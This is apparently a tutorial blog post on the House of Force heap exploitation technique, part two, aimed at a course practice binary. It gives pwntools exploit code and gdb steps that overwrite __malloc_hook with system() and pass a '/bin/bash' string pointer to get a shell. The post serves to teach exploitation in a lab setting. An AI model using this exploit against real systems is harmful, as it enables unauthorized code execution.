# House of Force II

<details>

<summary>Table of Contents</summary>

* [Memory Allocation Hooks](#memory-allocation-hooks)
  * [Why Hooks?](#why-hooks)
* [Hijacking the Hook](#hijacking-the-hook)
* [Command Execution](#command-execution)
* [References](#references)

</details>

## Memory Allocation Hooks

It's time to "level up" our House of Force technique to make it a *more considerable force to be reckoned with*. First, we must talk about some of the [Hooks for Malloc](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html) which you can find on the man pages, or from the link below:

{% embed url="<https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html>" %}
Memory Allocation Hooks
{% endembed %}

From the manual page above, we can see what these hooks do and where they could be useful:

<figure><img src="/files/UrRUGN4gy5sbuxVi3ZpW" alt=""><figcaption><p><code>__malloc_hook</code> example</p></figcaption></figure>

Simply put, if we use a `malloc` hook, we can have this hook run whenever `malloc` is called! Don't believe me? Look at what the official GNU site says about the `__malloc_hook`:

> *"The value of this variable is <mark style="background-color:orange;">a pointer to the function that</mark> `malloc` <mark style="background-color:orange;">uses</mark> <mark style="background-color:orange;">**whenever it is called**</mark><mark style="background-color:orange;">.</mark>"* - [GNU.org, Hooks for Malloc](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html)

We'll create an implementation, but first, let's discuss why we need these hooks to get our command execution. We're still going to be exploiting the `house_of_force` binary from the first blog post.

### Why Hooks?

Now, you might be wondering why we're using `__malloc_hook` to get command execution, especially in the context of this binary, so let's consider the alternatives. We can't use the stack: ASLR is still enabled and we haven't been able to leak a stack address. We could try to target the binary, but we've already done this when we overwrote the target in the user data. We could also mess around with structures like the `PLT` or `.fini_array` in order to get code execution.

{% hint style="info" %}
Both the `PLT` and `.fini_array` structures are just writeable arrays of function pointers.
{% endhint %}

Some super high-level overviews of these two:

* `Procedure Linkage Table (PLT)`: Any function that the program calls that comes from an external library, like `GLIBC` in this example, is represented in the `PLT`. It dynamically resolves symbol names to the correct addresses. The reason it remains writeable during the program's runtime is something called "[Lazy Linking](http://www.qnx.com/developers/docs/qnxcar2/index.jsp?topic=%2Fcom.qnx.doc.neutrino.prog%2Ftopic%2Fdevel_Lazy_binding.html)" (also known as lazy binding), which makes it so that a function's address is only resolved when it's *first* called. (Strictly speaking, the writeable pointers live in the `GOT` entries that the `PLT` stubs jump through.) So, we could just overwrite the `printf` `PLT` entry with the address of the code that we'd like to execute so that the next time the binary tries to call `printf`, it'll be *our* code that ends up getting executed.
* `.fini_array`: This is just an array of function pointers that are to be run once a program exits. If we overwrite `.fini_array` slots, we could hijack the program's flow of execution and have it run whatever we want if we can get the program to exit.

Unfortunately for us, as great as these methods are, we can't use them either. If we recall the `checksec` output of the binary, we can see that it was compiled with `Full RELRO`:

<figure><img src="/files/wKd8wVlvS6yrcCoEMN31" alt=""><figcaption><p>Full RELRO</p></figcaption></figure>

This makes it unviable for us to use the `PLT` or `.fini_array` because `Full RELRO` makes these two structures `read-only` after their initialization. Sh\*t, so the stack *and* the binary are out of the equation. So what now? Well... what about the heap itself? It would be a good idea, except we don't really have anything on the heap aside from our own data: no function pointers or any other useful data. So the heap's out. If we look at the program again, we can see that we do have a `libc` leak from the `puts` function.

<figure><img src="/files/1EWS7gO7yzcKiYRx5fr7" alt=""><figcaption><p><code>libc</code> <code>puts()</code> leak</p></figcaption></figure>

So this looks promising; now it's just a matter of figuring out what in `libc` we can target to get command execution. Turns out `libc` has a `PLT` as well as two other structures called `__exit_funcs` and `tls_dtors`, which behave similarly to the `.fini_array`. We could target those, but even though the `GLIBC PLT` is writeable throughout the lifetime of the program, triggering calls to the functions within it is going to be pretty difficult. Furthermore, `__exit_funcs` and `tls_dtors` are protected by a thing called **Pointer Guard**, which makes messing around with these structures pretty difficult as well. An awesome post on abusing exit handlers can be seen here:

{% embed url="<https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html>" %}
Abusing exit handlers, includes `__exit_funcs` & `tls_dtors`
{% endembed %}

> *"So what now?" x2*

There actually is something we can use, and it's heap-specific too! We can use the `malloc hooks`! Each of the core `malloc` functions, such as `malloc`, `free`, `realloc`, etc., has its own associated hook! They take the form of writeable function pointers in `GLIBC`'s `.data` section. These are typically used by developers to do neat things like implement their own memory allocators or collect `malloc` statistics. For us, however, we're going to finally get some command execution with them.

## Hijacking the Hook

To start, we're going to use the exploit script template and change a few lines of code. At the end I'll program my own variation of the exploit template given to us, but for right now, we just need to understand this because it *can* grow quite complex. Here's the code after making some alterations to the stock exploit template:

```python
#!/usr/bin/python3
from pwn import *

context.terminal = ['alacritty', '-e']
elf = context.binary = ELF("house_of_force", checksec=False)
libc = ELF(elf.runpath + b"/libc.so.6", checksec=False) # elf.libc broke again

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Select the "malloc" option; send size & data.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

# Calculate the "wraparound" distance between two addresses.
def delta(x, y):
    return (0xffffffffffffffff - x) + y

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

malloc(24, b"Z" * 24 + p64(0xffffffffffffffff))
distance = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)
malloc(distance, b"Y")  # bytes, not str: pwntools warns when handed text
# malloc(24, b"crow was here")

# =============================================================================

io.interactive()
```

Here, the script stays the same apart from the section between the two `=` bars. There, we overwrite the `top_chunk` size field with `0xffffffffffffffff`, and we no longer call the `delta` function from before (it's still defined in the template, just unused) because we're not wrapping around the `VA` space anymore: `libc` sits at a higher address than the heap, so a plain subtraction is enough. We set `distance` to the gap between the `top_chunk` and a spot just short of the `__malloc_hook`. We use `__malloc_hook - 0x20` because we want the allocation to stop *just before* the `malloc` hook, and `heap + 0x20` because the first `malloc(24)` already consumed a `0x20`-byte chunk, which leaves the `top_chunk` at `heap + 0x20`. We've also commented out the last `malloc` call because we want to see what this does to the program before we try to leverage it. So, let's run this script with the `GDB NOASLR` arguments:

<figure><img src="/files/xN5T9wNmxZtGofIdQw5X" alt=""><figcaption><p>Running script</p></figcaption></figure>
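Before poking at this in `gdb`, the `distance` arithmetic can be sanity-checked offline. The following is only a rough sketch: it assumes 64-bit `GLIBC` chunk rounding (8-byte size field, 16-byte alignment) and plugs in the example addresses that appear in this post's `NOASLR` run (`0x603000` for the heap start, `0x7ffff7bafc10` for `__malloc_hook`). The names `request2size` and `simulate` are illustrative helpers, not part of the exploit template.

```python
SIZE_SZ = 8        # width of the chunk size field on 64-bit (assumption)
ALIGN_MASK = 0xF   # chunks are 16-byte aligned on 64-bit (assumption)
MINSIZE = 0x20     # smallest possible chunk


def request2size(req):
    """Round a user request up to a chunk size, roughly as 64-bit GLIBC does."""
    return max((req + SIZE_SZ + ALIGN_MASK) & ~ALIGN_MASK, MINSIZE)


def simulate(heap, malloc_hook):
    """Model how the top chunk moves across the first two requests."""
    top = heap                        # top chunk starts at the heap start
    top += request2size(24)           # first malloc(24) -> top = heap + 0x20
    distance = (malloc_hook - 0x20) - (heap + 0x20)
    top += request2size(distance)     # second malloc(distance)
    next_user_data = top + 0x10       # user data begins after the 16-byte header
    return distance, top, next_user_data


distance, top, user = simulate(0x603000, 0x7ffff7bafc10)
print(hex(distance), hex(top), hex(user))
```

Under these assumptions the `top_chunk` ends up `0x10` bytes before `__malloc_hook`, so the user data of the *next* chunk we request starts exactly at the hook.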

And now, inside of `gdb` we can tinker with this all we want. Let's start by breaking with `^C` and inspecting the memory around the `__malloc_hook`:

```c
pwndbg> dq &__malloc_hook-2
```

We use `-2` instead of `-16` because `gdb` scales pointer arithmetic by the size of the pointed-to type: `&__malloc_hook` points to an 8-byte pointer, so `-2` steps back two `QWORD`s (16 bytes). So, let's see the output of this command:

<figure><img src="/files/BMNBIe660V8I3ONR3qwq" alt=""><figcaption><p>Output of <code>dq &#x26;__malloc_hook-2</code></p></figcaption></figure>

So, the highlighted `QWORD` is actually the `malloc` hook! Remember that we talked about this and how it's a *function pointer*. So, if we populate this `QWORD` with the address of a function, like `system`, it'll run this every time `malloc` is called! Another way you can find out where the `__malloc_hook` resides is by passing `&__malloc_hook` to `xinfo`:

<figure><img src="/files/OijRsM1u56K0EyVbNuci" alt=""><figcaption><p><code>&#x26;__malloc_hook: 0x7ffff7bafc10</code></p></figcaption></figure>

{% hint style="info" %}
When the `__malloc_hook` is `NULL` like this `QWORD` -> `0000000000000000`, then it doesn't do anything and `malloc` works normally. When it isn't `NULL` however, calls to `malloc` will subsequently be redirected to the address that the `__malloc_hook` holds. Your hacker senses should be tingling right about now.
{% endhint %}
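As a mental model for the hint above, the sketch below mimics the check that `malloc` performs in hook-enabled versions of `GLIBC`: read the hook and, if it isn't `NULL`, call it with the requested size instead of allocating. Everything here (`FakeLibc`, `fake_system`, the starting address) is a hypothetical Python stand-in for illustration, not real `GLIBC` code.

```python
class FakeLibc:
    """Toy model of malloc's hook check (hypothetical, for illustration only)."""

    def __init__(self):
        self.malloc_hook = None      # NULL hook: malloc behaves normally
        self.next_free = 0x603010    # pretend address of the next user data

    def malloc(self, size):
        hook = self.malloc_hook
        if hook is not None:
            # The hook receives malloc's first argument unchanged.
            # (The real hook also gets the caller's return address; omitted here.)
            return hook(size)
        addr = self.next_free
        self.next_free += (size + 8 + 15) & ~15   # advance by the chunk size
        return addr


def fake_system(command_ptr):
    # Stand-in for system(): just report the "pointer" it was handed.
    return f"system() called with pointer {command_ptr:#x}"


fake = FakeLibc()
normal = fake.malloc(24)             # hook is NULL -> ordinary allocation
fake.malloc_hook = fake_system       # simulate overwriting __malloc_hook
hijacked = fake.malloc(0x603030)     # the "size" is handed straight to the hook
print(hex(normal))
print(hijacked)
```

The key point is that whatever we pass as the size becomes the hook's first argument, which is what makes this so useful later on.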

Furthermore, if we run the `top_chunk` command, we can see the following output:

<figure><img src="/files/IXKRMXftE860GtXQ9ZrS" alt=""><figcaption><p><code>top_chunk</code> output</p></figcaption></figure>

This shows us that the `top_chunk` has been put right here, *right before* our `__malloc_hook`:

<figure><img src="/files/sNTzj5Q8IeHzaPMniSYe" alt=""><figcaption><p>Where the <code>top_chunk</code> has been placed</p></figcaption></figure>

The `top_chunk` has been perfectly placed so that the next call we make to `malloc` overwrites the `__malloc_hook`! Let's give this a try with a value like `0xdeadbeef`.

```python
...
malloc(24, b"Z" * 24 + p64(0xffffffffffffffff))
distance = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)
malloc(distance, b"Y")
malloc(24, p64(0xdeadbeef)) # uncommented this section and changed it to 0xdeadbeef
...
```
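For anyone unfamiliar with pwntools, `p64` in the snippet above packs an integer into 8 bytes, little-endian under the default context for a 64-bit x86 binary like this one. A stdlib-only equivalent, shown purely as an illustration with the hypothetical helper name `pack64`:

```python
import struct


def pack64(value):
    """Pack an unsigned 64-bit integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)


payload = pack64(0xdeadbeef)
top_size = pack64(0xffffffffffffffff)
print(payload)
print(top_size)
```

These 8 bytes are what land in the `__malloc_hook` `QWORD`, which is why `RIP` ends up holding `0xdeadbeef` once the hook gets called.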

Now, let's run this script again with the `GDB NOASLR` arguments. If we now try to use option one (`1`) in the binary menu to allocate memory, we can see we're allowed to choose a size:

<figure><img src="/files/gkMLyMto6IdzK8BX9CpW" alt=""><figcaption><p>Choosing byte size for <code>malloc</code></p></figcaption></figure>

However, after pressing enter, the program hangs, when under normal circumstances it would ask us for the data we'd like to put into the allocated memory. This happens because we've overwritten the `__malloc_hook` with `0xdeadbeef`. Since that's not a valid address, the program crashes as soon as `malloc` tries to call it. Sure enough, if we look at our `gdb` output:

<figure><img src="/files/G0zalgDeLCFxk78TtYzz" alt=""><figcaption><p><code>RIP = 0xdeadbeef</code></p></figcaption></figure>

<figure><img src="/files/ApVwM4FFNereJq9bPcee" alt=""><figcaption><p><code>__malloc_hook = 0xdeadbeef</code></p></figcaption></figure>

<figure><img src="/files/fK6pCzEWUqGB9zuo3jTB" alt=""><figcaption><p>Another way to see that <code>__malloc_hook = 0xdeadbeef</code></p></figcaption></figure>

With the `__malloc_hook` overwritten, the call to `malloc()` jumped to the address we supplied instead of allocating memory. The crash, and more importantly the value in the `RIP` register, confirm it. So, now all we need to do is find a viable function to overwrite the `__malloc_hook` with so that we can get a shell! We can use a `libc` function like `system()`!

## Command Execution

So, instead of `0xdeadbeef`, let's have the final `malloc()` call in our script write `libc.sym.system`:

```python
...
malloc(24, b"Z" * 24 + p64(0xffffffffffffffff))
distance = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)
malloc(distance, b"Y")
malloc(24, p64(libc.sym.system)) # &system() for our __malloc_hook
...
```

Now, every time there's a call to `malloc()`, it'll be redirected to `system()`. As many of you know, we need to set up the arguments for `system()` before we call it. In this case, we need to pass a shell to `system()`, something like `/bin/bash` or `/bin/sh`, or whatever. From the man pages, we can see that `system()` is a very simple function: it takes a single argument, a pointer to a string that will be interpreted as a command.

<figure><img src="/files/E9dX9UYcAAjxDV2o9V1m" alt=""><figcaption><p><code>system()</code> man page entry</p></figcaption></figure>

But where the hell will we find the address of the string "`/bin/bash`" in memory? Well... Remember this part of our script?

```python
malloc(distance, b"Y")
```

We could just replace the `Y` with our `/bin/bash`.

<figure><img src="/files/cP5RGzlTOryynU86WBGC" alt=""><figcaption><p>Setting up the shell string to be allocated to memory</p></figcaption></figure>

We make sure it's `null-terminated`. Furthermore, any argument passed to `malloc()` will now be passed to `system()` instead. So, we can supply the *address* of our `/bin/bash` string as the `size` portion of the `malloc()` request and it'll be passed to `system()` as its argument. Now, let's run this and find the offset of where this `/bin/bash` string is going to be.

<figure><img src="/files/IlIo2NVuwtyCF0Xcu9q4" alt=""><figcaption><p>Offset of <code>/bin/bash</code> = <code>0x30</code></p></figcaption></figure>

From the output of the command above, we can see that the `/bin/bash` string lives really, really early on in the heap memory. The heap starts at `0x603000` and the string is at an offset of `0x30`, at `0x603030`: `0x20` for the first chunk plus `0x10` for the second chunk's header. So, in our script, we can supply this address as `heap + 0x30`:

<figure><img src="/files/5GRpF6kJ1BAplxPY6Os9" alt=""><figcaption><p>Putting <code>/bin/bash</code> offset to <code>malloc()</code> size argument</p></figcaption></figure>
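Since the final changes only appear in screenshots, here is a rough, pwntools-free sketch of the request sequence as described in the text. It is a reconstruction under assumptions rather than the exact script: `build_requests` is a hypothetical helper, the `system` address passed in below is a made-up placeholder, and the heap and hook addresses are the example values from the `NOASLR` run.

```python
import struct


def build_requests(heap, malloc_hook, system):
    """Return the (size, data) pairs for the three malloc calls, plus the trigger size."""
    p64 = lambda v: struct.pack("<Q", v)
    distance = (malloc_hook - 0x20) - (heap + 0x20)
    requests = [
        (24, b"Z" * 24 + p64(0xffffffffffffffff)),  # overflow into the top_chunk size field
        (distance, b"/bin/bash\0"),                 # move top_chunk; string lands at heap + 0x30
        (24, p64(system)),                          # user data overlaps __malloc_hook
    ]
    trigger_size = heap + 0x30   # the "size" that system() will treat as a char *
    return requests, trigger_size


# 0x7ffff7800000 is a placeholder, NOT the real address of system().
requests, trigger_size = build_requests(0x603000, 0x7ffff7bafc10, 0x7ffff7800000)
for size, data in requests:
    print(hex(size), data)
print("trigger malloc with size", hex(trigger_size))
```

In the real script, each pair would go through the `malloc(size, data)` helper, and the trigger would be one more "malloc" menu request with `heap + 0x30` as the size, so that `system()` receives a pointer to `/bin/bash`.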

Now, if we run this program, it should yield us a shell!

<figure><img src="/files/0XW8u6qjjdfmOUS5StiL" alt=""><figcaption><p>Shell received!</p></figcaption></figure>

Would you look at that? We got a shell! :smile::tada: I also made it a bit more logging-intensive just to see all the steps in action:

<figure><img src="/files/xQ7lrkmOHczQyazqak0B" alt=""><figcaption><p>Final exploit output</p></figcaption></figure>

## References

{% embed url="<https://www.udemy.com/course/linux-heap-exploitation-part-1>" %}

{% embed url="<https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html>" %}

{% embed url="<https://man7.org/linux/man-pages/man3/malloc_hook.3.html>" %}

{% embed url="<http://www.qnx.com/developers/docs/qnxcar2/index.jsp?topic=/com.qnx.doc.neutrino.prog/topic/devel_Lazy_binding.html>" %}

{% embed url="<https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html>" %}


